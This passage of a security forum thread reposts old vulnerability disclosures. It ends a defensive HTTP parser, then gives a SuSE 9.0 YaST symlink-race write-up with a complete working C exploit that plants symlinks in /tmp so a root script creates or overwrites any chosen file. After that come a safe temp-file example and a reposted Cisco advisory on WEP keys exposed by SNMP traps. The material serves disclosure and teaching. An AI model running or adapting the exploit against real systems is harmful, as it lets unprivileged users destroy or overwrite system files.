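    if (strncmp(tok[2], "HTTP/1.", 7) != 0 || tok[2][7] < '0' || tok[2][7] > '1'
        || tok[2][8] != '\0')
        return 400;
    strcpy(r->method, tok[0]);
    strcpy(r->target, tok[1]);
    strcpy(r->version, tok[2]);
    return 0;
}

int main(void)
{
    /* constructed request lines, including the blank GET from the advisory */
    const char *samples[] = { "GET\r\n", "\r\n", "GET / HTTP/1.0\r\n",
                              "GET /index.asp HTTP/1.1\r\n", "BREW /pot HTTP/1.1\r\n" };
    struct request_line r;
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        int status = parse_request_line(samples[i], &r);
        printf("%-26.*s -> %d\n", (int)strcspn(samples[i], "\r\n"), samples[i], status);
    }
    return 0;
}
```

Every reject path returns before any field of the request is used, which is the property an embedded server needs: an incomplete line costs one error response, not a restart of the device.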

----------


## Mick Flemm

*SuSE 9.0*

SuSE 9.0 - YaST script SuSEconfig.gnome-filesystem 

There is a symlink problem in the SuSEconfig.gnome-filesystem script. A normal user can create and overwrite every file on the system. This script gets executed after a configuration change by the setup tool YaST. So if you have installed gnome or parts of gnome check this out. 


When this script gets executed by YaST after a configuration change it does the following: 

```
TEMP=/tmp/tmp.SuSEconfig.gnome-filesystem.$RANDOM
mkdir $TEMP
touch $TEMP/list
[...]
echo >$TEMP/found
[...]
```

The env variable $RANDOM includes a random number. In my tests this number goes up from 1 to 33000. But even if it goes up to 65535 it is still vul. to a symlink attack. This is nearly as bad as the symlink problem which has been found on SuSE 8.2. On 8.2 a SuSEconf script created a link with the $$ at the file end. 

I have used a little exploit written in C which creates the directory "/tmp/tmp.SuSEconfig.gnome-filesystem.1" up to 33000. In every directory I have created a symlink to a file which I want to create or to overwrite. As the filename I have taken the $TEMP/found and let it point to some file. In my test I have taken the /etc/nologin - and hey - it has worked! 

have phun! 


```
/*******************************************************************/
#include <stdio.h>
#include <stdlib.h>     /* exit */
#include <string.h>
#include <unistd.h>     /* read, symlink */
#include <sys/stat.h>   /* mkdir, umask */

#define PATH "/tmp/tmp.SuSEconfig.gnome-filesystem."
#define START 1
#define END 33000

int main(int argc, char **argv)
{
    int i;
    char buf[150];

    printf("\tSuSE 9.0 YaST script SuSEconfig.gnome-filesystem exploit\n");
    printf("\t-------------------------------------------------------------\n");
    printf("\tdiscovered and written by l0om <[email protected]>\n");
    printf("\t http://WWW.EXCLUDED.ORG\n\n");

    if(argc != 2) {
        printf("usage: %s <destination-file>\n",argv[0]);
        exit(0xff);
    }

    printf("### hit enter to create or overwrite file %s: ",argv[1]); fflush(stdout);
    read(0, buf, 1);   /* wait for a keypress on stdin */

    umask(0000);
    printf("working\n\n");
    /* one directory per possible $RANDOM value, each holding a "found" symlink */
    for(i = START; i < END; i++) {
        snprintf(buf, sizeof(buf),"%s%d",PATH,i);
        if(mkdir(buf,00777) == -1) {
            fprintf(stderr, "cannot creat directory [Nr.%d]\n",i);
            exit(0xff);
        }
        if(!(i%1000))printf(".");
        strcat(buf, "/found");
        if(symlink(argv[1], buf) == -1) {
            fprintf(stderr, "cannot creat symlink from %s to %s [Nr.%d]\n",buf,argv[1],i);
            exit(0xff);
        }
    }
    printf("\ndone!\n");
    printf("next time the SuSE.gnome-filesystem script gets executed\n");
    printf("we will create or overwrite file %s\n",argv[1]);
    return(0x00);
} /* i cant wait for the new gobbles comic!! */
```
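The fix for the script above is not a bigger random number but a temporary path the attacker cannot pre-create, plus an open() that refuses to go through a symlink. The following C program is an added example (not the SuSE script and not the exploit) that places the weak pattern next to the safe one: it plants the "found" symlink the post describes inside a private directory, shows that a plain O_CREAT|O_TRUNC open follows it to the victim file, and shows that mkdtemp() plus O_CREAT|O_EXCL|O_NOFOLLOW is refused with EEXIST. The directory names, the victim path and the function names are constructed.

```c
/* Added example (not the SuSE script or l0om's code): the temp-file pattern
 * that defeats a planted symlink. mkdtemp() picks an unguessable directory
 * name and fails if the path already exists; O_CREAT|O_EXCL|O_NOFOLLOW makes
 * the kernel refuse to create through a symlink. */
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Create a private work directory; tmpl must end in "XXXXXX" and is rewritten. */
static int make_private_dir(char *tmpl)
{
    return mkdtemp(tmpl) != NULL ? 0 : -1;
}

/* Create a brand-new file. Never follows an existing symlink and never
 * reuses an existing file; returns the fd, or -1 with errno set. */
static int create_new_file(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

/* Weak pattern from the script above, for contrast: a plain truncating open
 * (the shell's "echo >$TEMP/found"). Follows whatever symlink is there. */
static int create_file_unsafely(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0666);
}

/* Simulate the planted link: "found" -> victim inside a fresh directory, then
 * try both opens. Result bits: 1 = unsafe open followed the link,
 * 2 = safe open correctly failed with EEXIST. Returns -1 on setup error. */
static int symlink_race_demo(const char *victim)
{
    char dir[] = "/tmp/gnome-fs-demo.XXXXXX";   /* constructed path */
    char link[256];
    int result = 0;
    if (make_private_dir(dir) != 0) return -1;
    snprintf(link, sizeof link, "%s/found", dir);
    if (symlink(victim, link) != 0) { rmdir(dir); return -1; }

    int fd = create_file_unsafely(link);       /* writes through to victim */
    if (fd != -1) { result |= 1; close(fd); }

    fd = create_new_file(link);                /* refused: path is a symlink */
    if (fd == -1 && errno == EEXIST) result |= 2;
    else if (fd != -1) close(fd);

    unlink(link);
    rmdir(dir);
    return result;
}

int main(void)
{
    /* constructed victim path inside a second private directory */
    char vdir[] = "/tmp/gnome-fs-victim.XXXXXX";
    if (make_private_dir(vdir) != 0) { perror("mkdtemp"); return 1; }
    char victim[256];
    snprintf(victim, sizeof victim, "%s/target", vdir);

    int r = symlink_race_demo(victim);
    printf("unsafe open followed the planted symlink: %s\n", (r & 1) ? "yes" : "no");
    printf("O_EXCL|O_NOFOLLOW open refused it:        %s\n", (r & 2) ? "yes" : "no");
    printf("victim file now exists: %s\n", access(victim, F_OK) == 0 ? "yes" : "no");
    unlink(victim);
    rmdir(vdir);
    return 0;
}
```

Shell scripts get the same protection from mktemp -d instead of a hand-built $RANDOM name, and from writing only inside the directory it returns.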

----------


## Mick Flemm

*Cisco APs !!!*


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


Cisco Security Advisory: SNMP trap Reveals WEP Key in Cisco Aironet AP

Revision 1.0

For Public Release 2003 December 02 17:00 UTC (GMT)

- ------------------------------------------------------------------------

Summary
=======
Cisco Aironet Access Points (AP) running Cisco IOS software will send
any static Wired Equivalent Privacy (WEP) key in the cleartext to the
Simple Network Management Protocol (SNMP) server if the snmp-server
enable traps wlan-wep command is enabled. Affected hardware models are
the Cisco Aironet 1100, 1200, and 1400 series. This command is disabled
by default. The workaround is to disable this command. Any dynamically
set WEP key will not be disclosed.

Cisco Aironet AP models running VxWorks operating system are not
affected by this vulnerability. No other Cisco product is affected.

This advisory will be available at
http://www.cisco.com/warp/public/707/ci ... trap.shtml

Affected Products
=================
Cisco Aironet Access Point 1100, 1200 and 1400 series running Cisco IOS
are affected. The Cisco AP 350 running Cisco IOS software is not
affected. Access Points running a VxWorks based Operating System are
not affected.

To determine if you are running Cisco IOS software, type this command on
your workstation, replacing "10.0.0.1" with the IP address of your AP.
host%telnet 10.0.0.1

If you are not presented with a menu in a graphic form but simply with a
prompt (e.g., ap1200%) then you may be vulnerable.

To further confirm that you are running Cisco IOS software, type the
show version command at the prompt. If the result of the command is
similar to the example below, then you are running Cisco IOS software.
```
ap1200>show version
Cisco Internetwork Operating System Software
IOS (tm) C1200 Software (C1200-K9W7-M), Version 12.2(11)JA1, EARLY
DEPLOYMENT RELEASE SOFTWARE (fc1)
TAC Support: http://www.cisco.com/tac
Copyright (c) 1986-2003 by cisco Systems, Inc.
Compiled Mon 07-Jul-03 13:48 by ccai
Image text-base: 0x00003000, data-base: 0x004D46F4
```

If you have determined that Cisco IOS software is being used on the AP,
execute the following command.
```
ap1200#show running
.
.
.
.
snmp-server enable traps tty
snmp-server enable traps dot11-qos
snmp-server enable traps wlan-wep <<<<<<
....
```

If your configuration contains the line marked with <<, then you are
vulnerable.

Details
=======
If enabled, the snmp-server enable traps wlan-wep command will send
static WEP keys in cleartext to the SNMP server every time a key is
changed or the AP is rebooted. This vulnerability is opportunistic, and the
following conditions must be met for the vulnerability to be exploited.


* A snmp-server enable traps wlan-wep must be enabled. (It is disabled
by default.)
* An adversary must be able to intercept SNMP packets sent from the AP
to the SNMP server.
* The AP in question must be rebooted or static WEP key changed.

Under these circumstances, an adversary will be able to intercept all
static WEP keys.

Dynamically configured WEP keys are not affected by this vulnerability
and they will not be revealed. A WEP key is dynamically configured if you
are using one of the Extensible Authentication Protocol (EAP)
authentication protocols. The following EAP protocols are currently
supported in Cisco APs: LEAP, EAP-TLS, PEAP, EAP-MD5, and EAP-SIM.

This vulnerability is assigned Cisco bug ID CSCec55538.

Impact
======
By being able to intercept a static WEP key, an attacker can drastically
reduce the effort to break WEP encryption. Please note that this is true
only for cases in which you are not using one of the EAP protocols but
are using only static WEP keys.

Software Versions and Fixes
===========================
The vulnerable IOS releases are: 12.2(8)JA, 12.2(11)JA and 12.2(11)JA1.

The first fixed release is 12.2(13)JA1.

Obtaining Fixed Software
========================
Cisco is offering free software upgrades to remedy this vulnerability
for all affected customers. Customers may only install and expect
support for the feature sets they have purchased.

Customers with contracts should obtain upgraded software through their
regular update channels. For most customers, this means that upgrades
should be obtained through the Software Center on Cisco's worldwide
website at http://www.cisco.com.

Customers whose Cisco products are provided or maintained through prior
or existing agreement with third-party support organizations such as
Cisco Partners, authorized resellers, or service providers should
contact that support organization for assistance with the upgrade, which
should be free of charge.

Customers who purchase direct from Cisco but who do not hold a Cisco
service contract and customers who purchase through third-party vendors
but are unsuccessful at obtaining fixed software through their point of
sale should get their upgrades by contacting the Cisco Technical
Assistance Center (TAC). In those cases, customers may only upgrade to a
later version of the same release as indicated by the applicable row in
the Software Versions and Fixes table. TAC contacts are as follows:


* +1 800 553 2447 (toll-free from within North America)
* +1 408 526 7209 (toll call from anywhere in the world)
* email: [email protected].

See http://www.cisco.com/warp/public/687/Di ... rTAC.shtml for
additional TAC contact information, including special localized
telephone numbers and instructions and e-mail addresses for use in
various languages.

Please have your product serial number available and give the URL of
this notice as evidence of your entitlement to a free upgrade. Free
upgrades for non-contract customers must be requested through the TAC.

Please do not contact either "[email protected]" or
"[email protected]" for software upgrades.

Workarounds
===========
The workaround is to disable the associated SNMP trap command by typing
the following global command:
ap1200(config)#no snmp-server enable traps wlan-wep

While the above command will stop the AP from sending your WEP key,
Cisco recommends that you do not use static WEP keys but some of the EAP
authentication protocols supported by the AP. The WEP scheme itself has
several severe drawbacks. For more details regarding wireless LAN
security, please see
http://www.cisco.com/warp/public/779/sm ... ity.shtml/.
The papers there are regarding general wireless security and provide
configuration examples.

Exploitation and Public Announcements
=====================================
The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerabilities described in this advisory. This
vulnerability was discovered by Bill Van Devender.

Status of This Notice: FINAL
============================
This is a final advisory. Although Cisco cannot guarantee the accuracy
of all statements in this advisory, all of the facts have been checked
to the best of our ability. Cisco does not anticipate issuing updated
versions of this advisory unless there is some material change in the
facts. Should there be a significant change in the facts, Cisco will
update this advisory.

A stand-alone copy or paraphrase of the text of this security advisory
that omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain factual
errors.

Distribution
============
This notice will be posted on Cisco's worldwide website at
http://www.cisco.com/warp/public/707/ci ... trap.shtml.
In addition to worldwide web posting, a text version of this notice is
clear-signed with the Cisco PSIRT PGP key and is posted to the following
e-mail and Usenet news recipients:


* [email protected]
* [email protected] (includes CERT/CC)
* [email protected]
* [email protected]
* [email protected]
* [email protected]
* [email protected]
* comp.dcom.sys.cisco
* Various internal Cisco mailing lists

Future updates of this notice, if any, will be placed on Cisco's
worldwide web. Users concerned about this problem are encouraged to check
the URL given above for any updates.

Revision History
================
+---------+-----------+--------------------------------------------+
|Revision |2003-Dec-02|Initial public release. |
|1.0 | | |
+---------+-----------+--------------------------------------------+

Cisco Security Procedures
=========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and registering
to receive security information from Cisco, is available on Cisco's
worldwide website at http://www.cisco.com/warp/public/707/
sec_incident_response.shtml. This includes instructions for press
inquiries regarding Cisco security notices. All Cisco Security
Advisories are available at http://www.cisco.com/go/psirt.
- ------------------------------------------------------------------------

This notice is Copyright 2003 by Cisco Systems, Inc. This notice may be
redistributed freely after the release date given at the top of the
text, provided that redistributed copies are complete and unmodified,
and include all date and version information.
- ------------------------------------------------------------------------

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.3 (Cygwin)

iD8DBQE/zJu8ezGozzK2tZARAmiYAKDXu3yHFcy+TUigkwwbGQKdjQqYRgCgocC6
rmM4iYh8h84afbdOEljk/eg=
=mwKf
-----END PGP SIGNATURE-----

----------


## Mick Flemm

Deprecated...

----------

